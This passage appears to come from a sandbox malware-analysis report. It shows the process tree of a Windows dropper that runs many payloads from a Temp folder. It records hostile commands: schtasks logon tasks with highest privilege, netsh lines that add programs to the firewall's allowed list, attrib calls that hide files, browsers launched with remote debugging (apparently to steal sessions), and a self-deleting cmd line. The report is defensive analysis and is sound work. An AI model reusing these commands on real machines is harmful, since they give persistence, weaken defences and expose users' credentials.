      Executes dropped EXE
      PID:5956
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7836 -s 840
      4⤵
      Program crash
      PID:6940
- - C:\Users\Admin\AppData\Local\Temp\a\client.exe
    "C:\Users\Admin\AppData\Local\Temp\a\client.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:7536
  - - C:\Users\Admin\AppData\Local\Temp\a\client.exe
      "C:\Users\Admin\AppData\Local\Temp\a\client.exe"
      4⤵
      Executes dropped EXE
      PID:6968
  - - C:\Users\Admin\AppData\Local\Temp\a\client.exe
      "C:\Users\Admin\AppData\Local\Temp\a\client.exe"
      4⤵
      Executes dropped EXE
      PID:6416
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7536 -s 832
      4⤵
      Program crash
      PID:7236
- - C:\Users\Admin\AppData\Local\Temp\a\svc1.exe
    "C:\Users\Admin\AppData\Local\Temp\a\svc1.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:7288
  - - C:\Users\Admin\AppData\Local\Temp\a\svc1.exe
      "C:\Users\Admin\AppData\Local\Temp\a\svc1.exe"
      4⤵
      Executes dropped EXE
      PID:7556
  - - C:\Users\Admin\AppData\Local\Temp\a\svc1.exe
      "C:\Users\Admin\AppData\Local\Temp\a\svc1.exe"
      4⤵
      Executes dropped EXE
      PID:8016
  - - C:\Users\Admin\AppData\Local\Temp\a\svc1.exe
      "C:\Users\Admin\AppData\Local\Temp\a\svc1.exe"
      4⤵
      Executes dropped EXE
      PID:8172
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7288 -s 856
      4⤵
      Program crash
      PID:6264
- - C:\Users\Admin\AppData\Local\Temp\a\fusca%20game.exe
    "C:\Users\Admin\AppData\Local\Temp\a\fusca%20game.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    PID:6232
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\a\fusca%20game.exe" "fusca%20game.exe" ENABLE
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      System Location Discovery: System Language Discovery
      PID:3116
- - C:\Users\Admin\AppData\Local\Temp\a\svchost.exe
    "C:\Users\Admin\AppData\Local\Temp\a\svchost.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:6532
  - - C:\Users\Admin\AppData\Local\Temp\svchost.exe
      "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
      4⤵
      Drops startup file
      Adds Run key to start application
      Drops autorun.inf file
      System Location Discovery: System Language Discovery
      PID:6836
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\svchost.exe" "svchost.exe" ENABLE
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:5804
- - C:\Users\Admin\AppData\Local\Temp\a\jrirkfiweid.exe
    "C:\Users\Admin\AppData\Local\Temp\a\jrirkfiweid.exe"
    3⤵
    - Executes dropped EXE
    - Checks processor information in registry
    PID:7756
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      PID:4560
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc336fcc40,0x7ffc336fcc4c,0x7ffc336fcc58
        5⤵
        
        PID:2916
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      PID:7832
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc336fcc40,0x7ffc336fcc4c,0x7ffc336fcc58
        5⤵
        
        PID:7420
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2232,i,13803016332521390506,14391859746062947684,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=2220 /prefetch:2
        5⤵
        
        PID:5880
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1736,i,13803016332521390506,14391859746062947684,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=2368 /prefetch:3
        5⤵
        
        PID:964
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1896,i,13803016332521390506,14391859746062947684,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=2504 /prefetch:8
        5⤵
        
        PID:7560
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      PID:2092
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc336fcc40,0x7ffc336fcc4c,0x7ffc336fcc58
        5⤵
        
        PID:7320
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      PID:5312
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=132.0.6834.160 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=132.0.2957.140 --initial-client-data=0x244,0x248,0x24c,0x240,0x190,0x7ffc154db078,0x7ffc154db084,0x7ffc154db090
        5⤵
        
        PID:7548
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      PID:6200
- - C:\Users\Admin\AppData\Local\Temp\a\filfin1.exe
    "C:\Users\Admin\AppData\Local\Temp\a\filfin1.exe"
    3⤵
    - Executes dropped EXE
    PID:5864
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "svchoost.exe" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:7788
- - C:\Users\Admin\AppData\Local\Temp\a\cjrimgid.exe
    "C:\Users\Admin\AppData\Local\Temp\a\cjrimgid.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    PID:224
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      PID:3216
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc336fcc40,0x7ffc336fcc4c,0x7ffc336fcc58
        5⤵
        
        PID:7760
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      PID:2624
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xfc,0x10c,0x7ffc336fcc40,0x7ffc336fcc4c,0x7ffc336fcc58
        5⤵
        
        PID:7252
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      PID:7404
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc336fcc40,0x7ffc336fcc4c,0x7ffc336fcc58
        5⤵
        
        PID:5796
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2340,i,18276003020407534684,2129992320787363864,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=2208 /prefetch:2
        5⤵
        
        PID:6880
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1732,i,18276003020407534684,2129992320787363864,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=2456 /prefetch:3
        5⤵
        
        PID:8036
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1908,i,18276003020407534684,2129992320787363864,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=2592 /prefetch:8
        5⤵
        
        PID:7308
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3088,i,18276003020407534684,2129992320787363864,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=3100 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:5520
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3120,i,18276003020407534684,2129992320787363864,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=3152 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:8124
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4440,i,18276003020407534684,2129992320787363864,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=4508 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:7296
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4660,i,18276003020407534684,2129992320787363864,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=4688 /prefetch:8
        5⤵
        
        PID:8148
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      PID:5984
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      PID:1388
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=132.0.6834.160 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=132.0.2957.140 --initial-client-data=0x240,0x244,0x248,0x23c,0x300,0x7ffc3011b078,0x7ffc3011b084,0x7ffc3011b090
        5⤵
        
        PID:7420
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2404,i,1569277080121517105,13135361781308477520,262144 --variations-seed-version --mojo-platform-channel-handle=2408 /prefetch:2
        5⤵
        
        PID:2852
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1764,i,1569277080121517105,13135361781308477520,262144 --variations-seed-version --mojo-platform-channel-handle=3120 /prefetch:11
        5⤵
        
        PID:8164
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=1760,i,1569277080121517105,13135361781308477520,262144 --variations-seed-version --mojo-platform-channel-handle=3124 /prefetch:13
        5⤵
        
        PID:4796
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3428,i,1569277080121517105,13135361781308477520,262144 --variations-seed-version --mojo-platform-channel-handle=3452 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:5876
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3444,i,1569277080121517105,13135361781308477520,262144 --variations-seed-version --mojo-platform-channel-handle=3612 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:6824
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4724,i,1569277080121517105,13135361781308477520,262144 --variations-seed-version --mojo-platform-channel-handle=5088 /prefetch:14
        5⤵
        
        PID:5008
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4960,i,1569277080121517105,13135361781308477520,262144 --variations-seed-version --mojo-platform-channel-handle=5208 /prefetch:14
        5⤵
        
        PID:6904
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5624,i,1569277080121517105,13135361781308477520,262144 --variations-seed-version --mojo-platform-channel-handle=5692 /prefetch:14
        5⤵
        
        PID:6912
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\8qqq1" & exit
      4⤵
      PID:7188
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        5⤵
        Delays execution with timeout.exe
        
        PID:2852
- - C:\Users\Admin\AppData\Local\Temp\a\CPDB.exe
    "C:\Users\Admin\AppData\Local\Temp\a\CPDB.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:7856
- - C:\Users\Admin\AppData\Local\Temp\a\Server.exe
    "C:\Users\Admin\AppData\Local\Temp\a\Server.exe"
    3⤵
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: GetForegroundWindowSpam
    PID:6576
- - C:\Users\Admin\AppData\Local\Temp\a\discord.exe
    "C:\Users\Admin\AppData\Local\Temp\a\discord.exe"
    3⤵
    - Adds Run key to start application
    - Checks whether UAC is enabled
    - Drops file in Program Files directory
    - Suspicious behavior: GetForegroundWindowSpam
    PID:6972
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks.exe" /create /f /tn "UDP Monitor" /xml "C:\Users\Admin\AppData\Local\Temp\tmp5EAA.tmp"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:7140
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks.exe" /create /f /tn "UDP Monitor Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmp6E0C.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      Scheduled Task/Job: Scheduled Task
      PID:7452
- - C:\Users\Admin\AppData\Local\Temp\a\winX32.exe
    "C:\Users\Admin\AppData\Local\Temp\a\winX32.exe"
    3⤵
    - Drops startup file
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    PID:3324
  - - C:\Users\Admin\AppData\Roaming\winX32.exe
      "C:\Users\Admin\AppData\Roaming\winX32.exe"
      4⤵
      Drops startup file
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      PID:6220
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +h +r +s "C:\Users\Admin\AppData\Roaming\winX32.exe"
      4⤵
      Views/modifies file attributes
      PID:7576
- - C:\Users\Admin\AppData\Local\Temp\a\Discord2.exe
    "C:\Users\Admin\AppData\Local\Temp\a\Discord2.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2768
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Discord" /tr '"C:\Users\Admin\AppData\Roaming\Discord.exe"' & exit
      4⤵
      System Location Discovery: System Language Discovery
      PID:4988
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "Discord" /tr '"C:\Users\Admin\AppData\Roaming\Discord.exe"'
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:7312
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpAD18.tmp.bat""
      4⤵
      PID:6288
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        5⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:7680
    - - C:\Users\Admin\AppData\Roaming\Discord.exe
        
        "C:\Users\Admin\AppData\Roaming\Discord.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:7448
- - C:\Users\Admin\AppData\Local\Temp\a\File.exe
    "C:\Users\Admin\AppData\Local\Temp\a\File.exe"
    3⤵
    PID:6652
- - C:\Users\Admin\AppData\Local\Temp\a\nvc.exe
    "C:\Users\Admin\AppData\Local\Temp\a\nvc.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5352
- - C:\Users\Admin\AppData\Local\Temp\a\zx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\zx.exe"
    3⤵
    PID:3900
  - - C:\Users\Admin\AppData\Local\Temp\a\zx.exe
      "C:\Users\Admin\AppData\Local\Temp\a\zx.exe"
      4⤵
      Loads dropped DLL
      PID:5756
- - C:\Users\Admin\AppData\Local\Temp\a\ScreenSync.exe
    "C:\Users\Admin\AppData\Local\Temp\a\ScreenSync.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2628
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2628 -s 1324
      4⤵
      Program crash
      PID:7608
- - C:\Users\Admin\AppData\Local\Temp\a\InstallSetup.exe
    "C:\Users\Admin\AppData\Local\Temp\a\InstallSetup.exe"
    3⤵
    - Downloads MZ/PE file
    - System Location Discovery: System Language Discovery
    - Suspicious use of SendNotifyMessage
    PID:6244
  - - C:\Users\Admin\AppData\Local\Temp\D773.tmp.exe
      "C:\Users\Admin\AppData\Local\Temp\D773.tmp.exe"
      4⤵
      PID:436
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 436 -s 1536
        5⤵
        Program crash
        
        PID:2540
- - C:\Users\Admin\AppData\Local\Temp\a\Lead_dumper.exe
    "C:\Users\Admin\AppData\Local\Temp\a\Lead_dumper.exe"
    3⤵
    PID:6516
- C:\Users\Admin\AppData\Local\Temp\CA97.tmp.exe
  C:\Users\Admin\AppData\Local\Temp\CA97.tmp.exe
  2⤵
  - Executes dropped EXE
  PID:376
- - C:\Users\Admin\AppData\Local\Temp\CA97.tmp.exe
    C:\Users\Admin\AppData\Local\Temp\CA97.tmp.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:3604
- C:\Users\Admin\AppData\Local\Temp\CA65.tmp.exe
  C:\Users\Admin\AppData\Local\Temp\CA65.tmp.exe
  2⤵
  PID:1996

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 2136 -ip 2136
1⤵
PID:4808

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --string-annotations --always-read-main-dll --field-trial-handle=3900,i,1394014676065102427,603922297840707476,262144 --variations-seed-version --mojo-platform-channel-handle=2552 /prefetch:14
1⤵
PID:1620

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuNDMiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7MEVCQjdBMUItNTY2Mi00NDQwLUEyNUUtQzVDOTUzQTU3NENGfSIgdXNlcmlkPSJ7RDhENDk0QjctMkE5NS00QjI2LTk2OTEtNjY4QzkwNTAzQUVGfSIgaW5zdGFsbHNvdXJjZT0ibGltaXRlZCIgcmVxdWVzdGlkPSJ7Q0Y0NEY2NzQtMTdDRS00OUY3LTgwMEItNDQ1MEZERTEzQzc2fSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjIiIHBoeXNtZW1vcnk9IjQiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4yMjAwMC40OTMiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIiBpc19pbl9sb2NrZG93bl9tb2RlPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iIiBwcm9kdWN0X25hbWU9IiIvPjxleHAgZXRhZz0iJnF1b3Q7RSt4YkF6Nlk2c1UxMjg5YlM2cWw0VlJMYmtqZkJVR1RNSnNqckhyNDRpST0mcXVvdDsiLz48YXBwIGFwcGlkPSJ7OEE2OUQzNDUtRDU2NC00NjNjLUFGRjEtQTY5RDlFNTMwRjk2fSIgdmVyc2lvbj0iMTIzLjAuNjMxMi4xMjMiIG5leHR2ZXJzaW9uPSIiIGxhbmc9ImVuIiBicmFuZD0iR0dMUyIgY2xpZW50PSIiIGluc3RhbGxhZ2U9IjEiIGluc3RhbGxkYXRldGltZT0iMTczODk1NTAyNyIgb29iZV9pbnN0YWxsX3RpbWU9IjEzM